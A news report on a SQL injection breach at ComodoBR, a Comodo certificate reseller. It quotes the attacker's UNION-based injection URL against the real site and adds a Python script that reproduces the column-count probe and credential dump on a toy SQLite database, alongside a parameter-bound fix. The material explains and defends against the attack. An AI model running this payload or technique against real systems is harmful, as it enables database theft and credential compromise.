Another Comodo SSL reseller hacked
ComodoBR, the Brazilian partner of the Comodo Certificate Authority (CA), appears to have fallen victim to an attack. During the incident, parts of the company's database, including customer data and submitted certificate requests, were accessed via SQL injection.
The certificate signing requests themselves carry only public keys and subject details, so they give an attacker little to work with. The incident is nevertheless a serious security problem because the same database records also contained the access credentials of ComodoBR employees. It remains unclear whether unauthorised third parties could have used these credentials to have certificates issued; since resellers place orders through accounts on the CA's systems, stolen reseller credentials are an issuance path even when the CA's own infrastructure is untouched. Back in March, a hacker had managed to exploit a vulnerability in the servers of an Italian Comodo partner to obtain nine certificates for existing high-profile domains, forcing browser developers to deploy updates that blocked those certificates.
The hacker behind the current attack says that he wanted to test the security of other Comodo partners. On Pastebin, he has documented how he used the sqlmap Python tool to find the SQL injection vulnerabilities. He reportedly used the URL
https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -
to access the database tables. The payload is a classic UNION-based injection: the unvalidated prod parameter is concatenated into a query that returns 15 columns, so a UNION with 15 numbered columns lets the attacker read rows from any other table the application's database account can see, and the trailing -- - comments out whatever follows in the original query.
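As an added illustration, not taken from the page, the Pastebin post or sqlmap, the following Python script reproduces the mechanics of the payload above against a constructed SQLite database. The products and employees tables, their rows and the three-column product query are assumptions (the ComodoBR query returned 15 columns, and its database engine is not stated). It shows the column-count probe that produces the 0,1,2,... list, the UNION that reads the credentials table through the product lookup, and a hardened lookup that validates and binds the parameter so the same payload is rejected.

```python
import sqlite3

# Constructed sample schema and data (assumption, not ComodoBR's database).
# The real query returned 15 columns; this toy one returns 3.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
CREATE TABLE employees (id INTEGER PRIMARY KEY, login TEXT, password_hash TEXT);
INSERT INTO products VALUES (8, 'Code Signing Certificate', 179.0);
INSERT INTO products VALUES (9, 'Wildcard SSL Certificate', 349.0);
INSERT INTO employees VALUES (1, 'alice', 'sha1$c0ffee');
INSERT INTO employees VALUES (2, 'bob', 'sha1$deadbeef');
"""


def open_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def product_lookup_vulnerable(conn, prod):
    """Hypothetical product page handler: the ?prod= value is concatenated
    straight into SQL, which is the defect behind the ComodoBR payload."""
    sql = "SELECT id, name, price FROM products WHERE id = " + prod
    return conn.execute(sql).fetchall()


def product_lookup_hardened(conn, prod):
    """Same lookup with the parameter validated as an integer and bound,
    so attacker input is never parsed as SQL."""
    try:
        prod_id = int(prod)
    except (TypeError, ValueError):
        raise ValueError("prod must be an integer product id")
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return conn.execute(sql, (prod_id,)).fetchall()


def find_column_count(conn, lookup, max_cols=20):
    """Column-count probe, the step that yields the 0,1,2,...,14 list in the
    pasted URL: append UNION ALL SELECT with n constants and widen n until
    the database stops rejecting the mismatched UNION. Returns None if no
    width up to max_cols works."""
    for n in range(1, max_cols + 1):
        constants = ",".join(str(i) for i in range(n))
        # '-- -' comments out the rest of the original query; the extra '-'
        # is the sqlmap idiom that keeps the comment valid on MySQL, which
        # requires whitespace after '--'.
        payload = "8 UNION ALL SELECT %s -- -" % constants
        try:
            lookup(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
    return None


def dump_employees_via_union(conn, lookup, ncols):
    """Once the width is known, read another table through the product
    lookup. An id that matches no product (-1) ensures only injected rows
    come back; NULL pads the select list to the required width."""
    select_list = ",".join(["login", "password_hash"] + ["NULL"] * (ncols - 2))
    payload = "-1 UNION ALL SELECT %s FROM employees -- -" % select_list
    rows = lookup(conn, payload)
    return sorted((login, pw_hash) for login, pw_hash, *_ in rows)


def hardened_rejects(conn, payload):
    """True if the hardened lookup refuses the payload outright."""
    try:
        product_lookup_hardened(conn, payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = open_db()
    width = find_column_count(db, product_lookup_vulnerable)
    print("vulnerable query width:", width)
    print("leaked credentials:",
          dump_employees_via_union(db, product_lookup_vulnerable, width))
    evil = "-1 UNION ALL SELECT login,password_hash,NULL FROM employees -- -"
    print("hardened lookup rejects payload:", hardened_rejects(db, evil))
    print("hardened lookup, normal input:", product_lookup_hardened(db, "8"))
```

The probe loop is the generic version of what sqlmap automates: the error on a mismatched UNION width is the oracle, and the first width that runs cleanly is the column count the attacker then fills with the columns he wants to read. Binding the parameter is what closes the hole; the integer check on top of it simply gives a clean error for anything that is not a product id.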
Comodo has emphasised that its own security was not compromised by the attack. The CA said that resellers and partners have no access to Comodo's databases.
See also:
- Single hacker claims responsibility for Comodo certificate theft, a report from The H.
(crve)